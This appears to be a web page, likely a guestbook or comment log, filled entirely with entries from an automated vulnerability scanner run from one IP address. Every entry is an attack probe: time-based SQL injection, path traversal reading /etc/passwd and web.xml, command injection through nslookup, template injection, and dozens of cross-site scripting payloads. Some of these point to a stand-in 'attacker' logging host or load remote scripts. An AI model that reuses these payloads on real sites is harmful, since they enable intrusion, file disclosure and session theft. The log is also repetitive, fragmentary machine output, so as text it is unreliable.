e [!(()&&!|*|*|] 2020-10-28 21:40:18

1

e [116.113.93.82] 2020-10-28 21:40:18

1

e [116.113.93.82] 2020-10-28 21:40:18

1

e [file:///etc/passwd] 2020-10-28 21:40:18

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 21:40:18

1

e [z3kcaHsM'; waitfor delay '0:0:9' -- ] 2020-10-28 21:40:18

1

e [116.113.93.82] 2020-10-28 21:40:17

1

e [)] 2020-10-28 21:40:17

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 21:40:17

1

e [116.113.93.82] 2020-10-28 21:40:17

1

e [116.113.93.82&n998750=v958294] 2020-10-28 21:40:17

1

e [1 waitfor delay '0:0:6' -- ] 2020-10-28 21:40:16

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 21:40:16

1

e [..] 2020-10-28 21:40:16

1

e [116.113.93.82] 2020-10-28 21:40:16

1

e [116.113.93.82] 2020-10-28 21:40:16

1

e [116.113.93.82] 2020-10-28 21:40:16

Array

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 21:40:15

1

e [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 21:40:15

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 21:40:15

1

e [116.113.93.82] 2020-10-28 21:40:15

1

e [116.113.93.82] 2020-10-28 21:40:15

Array

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 21:40:14

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 21:40:14

1

e [0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z] 2020-10-28 21:40:14

1

e [116.113.93.82] 2020-10-28 21:40:14

12345'"\'\");|]*{ <>

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 21:40:13

1

e [116.113.93.82] 2020-10-28 21:40:13

1

e [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-28 21:40:13

1

e [116.113.93.82] 2020-10-28 21:40:13

${9999821+9999449}

e [116.113.93.82] 2020-10-28 21:40:13

e [116.113.93.82] 2020-10-28 21:40:13

"+response.write(9949659*9672575)+"

e [%2fetc%2fpasswd] 2020-10-28 21:40:12

1

e [116.113.93.82] 2020-10-28 21:40:12

1

e [if(now()=sysdate(),sleep(9),0)] 2020-10-28 21:40:12

1

e [116.113.93.82] 2020-10-28 21:40:12

&nslookup Xi0UN2Ob&'\"`0&nslookup Xi0UN2Ob&`'

e [116.113.93.82] 2020-10-28 21:40:12

'+response.write(9949659*9672575)+'

e [/etc/passwd] 2020-10-28 21:40:12

1

e [116.113.93.82] 2020-10-28 21:40:12

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [-1" OR 2+828-828-1=0+0+0+1 -- ] 2020-10-28 21:40:12

1

e [116.113.93.82] 2020-10-28 21:40:12

$(nslookup X7hunGAE)

e [${9999394+9999204}] 2020-10-28 21:40:11

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 21:40:11

1

e [116.113.93.82] 2020-10-28 21:40:11

response.write(9949659*9672575)

e [-1' OR 2+166-166-1=0+0+0+1 or 'Y4KBzbXi'='] 2020-10-28 21:40:10

1

e [116.113.93.82] 2020-10-28 21:40:10

set|set&set

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 21:40:10

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 21:40:09

1

e [-1' OR 2+615-615-1=0+0+0+1 -- ] 2020-10-28 21:40:09

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 21:40:09

1

e [116.113.93.82] 2020-10-28 21:40:08

1

e [-1 OR 2+650-650-1=0+0+0+1] 2020-10-28 21:40:08

1

e [Array] 2020-10-28 21:40:08

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 21:40:08

1

e [-1 OR 2+456-456-1=0+0+0+1 -- ] 2020-10-28 21:40:07

1

e [Array] 2020-10-28 21:40:07

1

e [&nslookup ciHqakgT&'\"`0&nslookup ciHqakgT&`'] 2020-10-28 21:40:06

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 21:40:06

1

e [116.113.93.82] 2020-10-28 21:40:06

dypzopN4

e [12345'"\'\");|]*{ <>] 2020-10-28 21:40:06

1

e ["+response.write(9533215*9602192)+"] 2020-10-28 21:40:06

1

e [l4ALOm05] 2020-10-28 21:40:06

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 21:40:05

1

e [$(nslookup 00j1fqDU)] 2020-10-28 21:40:05

1

e [] 2020-10-28 21:40:05

1

e ['+response.write(9533215*9602192)+'] 2020-10-28 21:40:05

1

e [116.113.93.82] 2020-10-28 21:40:05

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 21:40:04

1

e [5ZHWQxjN] 2020-10-28 21:40:04

1

e [set|set&set] 2020-10-28 21:40:04

1

e [response.write(9533215*9602192)] 2020-10-28 21:40:04

1

e [116.113.93.82] 2020-10-28 21:40:04

1

e [116.113.93.82] 2020-10-28 21:38:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:42:22

1

GRLpGpAG"><script>1Yrb(9990)</script> [116.113.93.82] 2020-10-28 20:42:19

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(1Yrb(9890))'bad=" [116.113.93.82] 2020-10-28 20:42:18

1

[116.113.93.82] 2020-10-28 20:42:15

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%31%59%72%62%28%39%38%34%30%29%22 [116.113.93.82] 2020-10-28 20:42:13

1

GRLpGpAG\u0022onmouseover=1Yrb(9352)\u0022 [116.113.93.82] 2020-10-28 20:42:11

1

GRLpGpAG" I2Vy=1Yrb([!+!]) TUN=" [116.113.93.82] 2020-10-28 20:42:08

1

GRLpGpAG"onmouseover=1Yrb(9277)" [116.113.93.82] 2020-10-28 20:42:06

1

GRLpGpAG<9nj0hW< [116.113.93.82] 2020-10-28 20:42:03

1

GRLpGpAG<img sRc='http://attacker-9126/log.php? [116.113.93.82] 2020-10-28 20:42:01

1

GRLpGpAG<K2SY2d x=9409> [116.113.93.82] 2020-10-28 20:41:58

1

GRLpGpAG<ifRAme sRc=9370.com></IfRamE> [116.113.93.82] 2020-10-28 20:41:56

1

GRLpGpAG<WSWJ5D>YESYS[!+!]</WSWJ5D> [116.113.93.82] 2020-10-28 20:41:54

1

GRLpGpAG0n6uS <ScRiPt >1Yrb(9818)</ScRiPt> [116.113.93.82] 2020-10-28 20:41:51

1

GRLpGpAG<% contenteditable onresize=1Yrb(9328)> [116.113.93.82] 2020-10-28 20:41:49

1

GRLpGpAG}body{acu:Expre/**/SSion(1Yrb(9480))} [116.113.93.82] 2020-10-28 20:41:47

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9449);//><!-- --> [116.113.93.82] 2020-10-28 20:41:45

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 20:41:42

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 20:41:40

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 20:41:38

1

GRLpGpAG<input autofocus onfocus=1Yrb(9966)> [116.113.93.82] 2020-10-28 20:41:36

1

[116.113.93.82] 2020-10-28 20:41:34

1

GRLpGpAG<ScRiPt>1Yrb(9808)</sCripT> [116.113.93.82] 2020-10-28 20:41:31

1

GRLpGpAG\u003CScRiPt\1Yrb(9479)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 20:41:29

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%31%59%72%62%289444%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 20:41:27

1

GRLpGpAG<img/src=">" onerror=alert(9345)> [116.113.93.82] 2020-10-28 20:41:25

1

GRLpGpAG<img src=xyz OnErRor=1Yrb(9199)> [116.113.93.82] 2020-10-28 20:41:23

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=1Yrb(9418)> [116.113.93.82] 2020-10-28 20:41:21

1

GRLpGpAG<body onload=1Yrb(9805)> [116.113.93.82] 2020-10-28 20:41:18

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9533'> [116.113.93.82] 2020-10-28 20:41:17

1

GRLpGpAG<isindex type=image src=1 onerror=1Yrb(9387)> [116.113.93.82] 2020-10-28 20:41:14

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 20:41:12

1

GRLpGpAG<video><source onerror="javascript:1Yrb(9308)"> [116.113.93.82] 2020-10-28 20:41:09

1

GRLpGpAG<ScRiPt >1Yrb(9753)</ScRiPt> [116.113.93.82] 2020-10-28 20:41:07

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9182></ScRiPt> [116.113.93.82] 2020-10-28 20:41:05

1

GRLpGpAG<ScRiPt >1Yrb(9887)</ScRiPt> [116.113.93.82] 2020-10-28 20:41:02

1

GRLpGpAG<ScR<ScRiPt>IpT>1Yrb(9180)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 20:41:00

1

GRLpGpAG<script>1Yrb(9447)</script> [116.113.93.82] 2020-10-28 20:40:58

1

GRLpGpAG<WUQPKI>BMCTU[!+!]</WUQPKI> [116.113.93.82] 2020-10-28 20:40:56

1

GRLpGpAG<ScRiPt >1Yrb(9116)</ScRiPt> [116.113.93.82] 2020-10-28 20:40:54

1

{{9999001*10000408}} [116.113.93.82] 2020-10-28 20:40:51

1

acux4098 [116.113.93.82] 2020-10-28 20:40:49

1

acu2753<s1﹥s2ʺs3ʹuca2753 [116.113.93.82] 2020-10-28 20:40:47

1

{{9999476*9999840}} [116.113.93.82] 2020-10-28 20:40:45

1

acux1195 [116.113.93.82] 2020-10-28 20:40:42

1

acu5358<s1﹥s2ʺs3ʹuca5358 [116.113.93.82] 2020-10-28 20:40:40

1

GRLpGpAG9347112 [116.113.93.82] 2020-10-28 20:40:38

1

'"()&%<acx><ScRiPt >1Yrb(9826)</ScRiPt> [116.113.93.82] 2020-10-28 20:40:36

1

GRLpGpAG'"()&%<acx><ScRiPt >1Yrb(9126)</ScRiPt> [116.113.93.82] 2020-10-28 20:40:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:31

1<fuRRFB<

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:28

1<img sRc='http://attacker-9128/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:27

1<pGPFSR x=9536>

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:24

1<ifRAme sRc=9468.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:22

1<WJ3NDA>XULFE[!+!]</WJ3NDA>

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:19

1NXKGE <ScRiPt >1Yrb(9483)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:17

1<% contenteditable onresize=1Yrb(9286)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:15

1}body{acu:Expre/**/SSion(1Yrb(9964))}

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:13

1<img<!-- --> src=x onerror=alert(9893);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:11

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:08

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:07

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:05

1<input autofocus onfocus=1Yrb(9108)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:03

GRLpGpAG [116.113.93.82] 2020-10-28 20:40:00

1<ScRiPt>1Yrb(9854)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:58

1\u003CScRiPt\1Yrb(9346)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:57

%31%3C%53%63%52%69%50%74%20%3E%31%59%72%62%289325%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:54

1<img/src=">" onerror=alert(9998)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:52

1<img src=xyz OnErRor=1Yrb(9734)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:50

1<img src=//testasp.vulnweb.com/t/dot.gif onload=1Yrb(9029)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:48

1<body onload=1Yrb(9227)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:46

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9948'>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:44

1<isindex type=image src=1 onerror=1Yrb(9141)>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:41

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:39

1<video><source onerror="javascript:1Yrb(9449)">

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:38

1<ScRiPt >1Yrb(9738)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:36

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9386></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:34

1<ScRiPt >1Yrb(9540)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:32

1<ScR<ScRiPt>IpT>1Yrb(9883)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:29

1<script>1Yrb(9578)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:27

1<WLTFUP>UXLNC[!+!]</WLTFUP>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:26

1<ScRiPt >1Yrb(9338)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:23

{{9999928*9999047}}

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:21

acux5483

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:19

acu4464<s1﹥s2ʺs3ʹuca4464

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:17

19799816

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:15

'"()&%<acx><ScRiPt >1Yrb(9961)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 20:39:13

1'"()&%<acx><ScRiPt >1Yrb(9833)</ScRiPt>

GRLpGpAG [116.113.93.82<OirnEt<] 2020-10-28 20:39:07

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9879/log.php?] 2020-10-28 20:39:05

1

GRLpGpAG [116.113.93.82<OWlX5R x=9027>] 2020-10-28 20:39:03

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9684.com></IfRamE>] 2020-10-28 20:39:01

1

GRLpGpAG [116.113.93.82<WLE6LV>ZNPUK[!+!]</WLE6LV>] 2020-10-28 20:38:58

1

GRLpGpAG [116.113.93.82eOLVo <ScRiPt >1Yrb(9869)</ScRiPt>] 2020-10-28 20:38:57

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=1Yrb(9253)>] 2020-10-28 20:38:55

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(1Yrb(9455))}] 2020-10-28 20:38:52

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9044);//><!-- -->] 2020-10-28 20:38:50

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 20:38:48

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 20:38:46

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 20:38:44

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=1Yrb(9930)>] 2020-10-28 20:38:42

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 20:38:41

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 20:38:40

1

GRLpGpAG [] 2020-10-28 20:38:40

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 20:38:39

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 20:38:38

1

GRLpGpAG [116.113.93.82<ScRiPt>1Yrb(9477)</sCripT>] 2020-10-28 20:38:38

1

file:///etc/passwd [116.113.93.82] 2020-10-28 20:38:38

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 20:38:37

1

GRLpGpAG [116.113.93.82\u003CScRiPt\1Yrb(9486)\u003C/sCripT\u003E] 2020-10-28 20:38:37

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:37

1

.. [116.113.93.82] 2020-10-28 20:38:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:36

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 20:38:35

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%31%59%72%62%289010%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 20:38:35

1

ozLR2mfa'));select pg_sleep(3); -- [116.113.93.82] 2020-10-28 20:38:35

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 20:38:34

1

cgb9Q0Lm');select pg_sleep(9); -- [116.113.93.82] 2020-10-28 20:38:34

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 20:38:33

1

rWBftVro';select pg_sleep(9); -- [116.113.93.82] 2020-10-28 20:38:33

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9048)>] 2020-10-28 20:38:33

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 20:38:32

1

V9eu43RQ'; waitfor delay '0:0:6' -- [116.113.93.82] 2020-10-28 20:38:32

1

/etc/passwd [116.113.93.82] 2020-10-28 20:38:31

1

1 waitfor delay '0:0:6' -- [116.113.93.82] 2020-10-28 20:38:31

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=1Yrb(9430)>] 2020-10-28 20:38:30

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 20:38:30

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ [116.113.93.82] 2020-10-28 20:38:30

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 20:38:29

1

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z [116.113.93.82] 2020-10-28 20:38:28

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=1Yrb(9716)>] 2020-10-28 20:38:28

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 20:38:28

1

0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z [116.113.93.82] 2020-10-28 20:38:28

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 20:38:27

1

if(now()=sysdate(),sleep(9),0) [116.113.93.82] 2020-10-28 20:38:27

1

GRLpGpAG [116.113.93.82<body onload=1Yrb(9807)>] 2020-10-28 20:38:27

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 20:38:27

1

-1" OR 2+491-491-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:38:26

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 20:38:26

1

-1' OR 2+748-748-1=0+0+0+1 or 'A6pVD8Xb'=' [116.113.93.82] 2020-10-28 20:38:25

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 20:38:25

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9135'>] 2020-10-28 20:38:25

1

-1' OR 2+941-941-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:38:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:24

WEB-INF\web.xml

-1 OR 2+813-813-1=0+0+0+1 [116.113.93.82] 2020-10-28 20:38:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:22

WEB-INF/web.xml

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=1Yrb(9283)>] 2020-10-28 20:38:22

1

-1 OR 2+832-832-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 20:38:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:21

/WEB-INF/web.xml

WpAX3W30 [116.113.93.82] 2020-10-28 20:38:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:20

/\../\../\../\../\../\../\../etc/passwd

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 20:38:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:19

file:///etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:18

vuyHViNs'));select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:18

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82<video><source onerror="javascript:1Yrb(9399)">] 2020-10-28 20:38:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:18

..

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:18

UWtcw4RR');select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:17

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:17

WJLGL0YG';select pg_sleep(3); --

GRLpGpAG [116.113.93.82<ScRiPt >1Yrb(9336)</ScRiPt>] 2020-10-28 20:38:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:16

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:16

-1));select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:15

-1);select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:15

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9435></ScRiPt>] 2020-10-28 20:38:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:14

%2fetc%2fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:14

-1;select pg_sleep(9); --

[116.113.93.82] 2020-10-28 20:38:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:13

TX3rNced'; waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:13

/etc/passwd

[116.113.93.82] 2020-10-28 20:38:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:12

1 waitfor delay '0:0:6' --

GRLpGpAG [116.113.93.82<ScRiPt >1Yrb(9713)</ScRiPt>] 2020-10-28 20:38:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:12

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

JyI= [116.113.93.82] 2020-10-28 20:38:11

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:11

/../..//../..//../..//../..//../..//etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:11

-1); waitfor delay '0:0:6' --

@@2gP14 [116.113.93.82] 2020-10-28 20:38:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:10

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>1Yrb(9664)</sCr<ScRiPt>IpT>] 2020-10-28 20:38:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:10

-1; waitfor delay '0:0:6' --

1 [116.113.93.82] 2020-10-28 20:38:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:09

../../../../../../../../../../etc/passwd.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:08

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

\ [116.113.93.82] 2020-10-28 20:38:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:08

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:08

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

GRLpGpAG [116.113.93.82<script>1Yrb(9265)</script>] 2020-10-28 20:38:08

1

1'" [116.113.93.82] 2020-10-28 20:38:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:07

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:07

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:07

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:06

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:06

if(now()=sysdate(),sleep(3),0)

GRLpGpAG [116.113.93.82<WYJZX7>NDO6U[!+!]</WYJZX7>] 2020-10-28 20:38:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:06

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:05

-1" OR 2+936-936-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:05

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:04

-1' OR 2+190-190-1=0+0+0+1 or 'kHrfRvDl'='

GRLpGpAG [116.113.93.82<ScRiPt >1Yrb(9534)</ScRiPt>] 2020-10-28 20:38:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:04

@@BgV9G

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:03

-1' OR 2+438-438-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:02

-1 OR 2+468-468-1=0+0+0+1

GRLpGpAG [{{9999162*10000206}}] 2020-10-28 20:38:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:01

\

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:01

-1 OR 2+338-338-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:00

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 20:38:00

K5AFeG32

GRLpGpAG [acux2782] 2020-10-28 20:37:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:58

1

